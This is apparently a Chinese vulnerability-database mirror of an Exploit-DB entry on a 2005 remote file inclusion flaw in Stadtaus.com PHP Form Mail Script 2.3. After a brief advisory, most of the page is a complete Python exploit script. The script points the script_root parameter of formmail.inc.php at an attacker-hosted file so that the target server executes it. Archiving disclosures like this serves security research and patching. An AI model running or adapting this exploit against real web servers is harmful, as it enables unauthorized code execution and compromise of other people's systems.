Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054949 漏洞类型
发布时间 2005-03-05 更新时间 2005-03-05
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25192
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12735/info

PHP Form Mail Script is prone to remote file include vulnerability.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

PHP Form Mail Script 2.3 and prior versions are vulnerable to this issue. 

#!/usr/bin/python
# Form Mail Script (FS) remote file inclusion exploit
# Coded by: mozako - mozako [at] mybox [dot] it
# Vuln. Discovered by: Filip Groszynski
# 5 March 2005
#
# (C) 2005 badroot security
import urllib2
import sys
__argv__ = sys.argv
def usage():
   print "Form Mail Script (FS) remote file inclusion exploit \nby:
mozako\n3.3.2005\n\nUsage:\n$ ./phpN.py -h http://123.4.5.6 -p
/PHP_News_Path/ -u http://filetoupload"
   sys.exit(-1)
if len(__argv__) < 2:
   usage()
try:
   global host
   global path
   global url
   host = __argv__[2]
   path = __argv__[4]
   url = __argv__[6]
except IndexError:
       usage()
def hack():
   try:
       print "[X] Connecting...",
       urllib2.urlopen(host + path +
"inc/formmail.inc.php?script_root=" + url)
       print "[OK]"
       print "[X] Sending exploit...", "[OK]"
       print "[X] Exploited !"
   except urllib2.HTTPError:
       print "[Failed]"
   except urllib2.httplib.InvalidURL:
       print "[Bad host]\nis there http:// ? :)"
   except ValueError:
       print "[Bad host]\nis there http:// ? :)"
hack()
# eof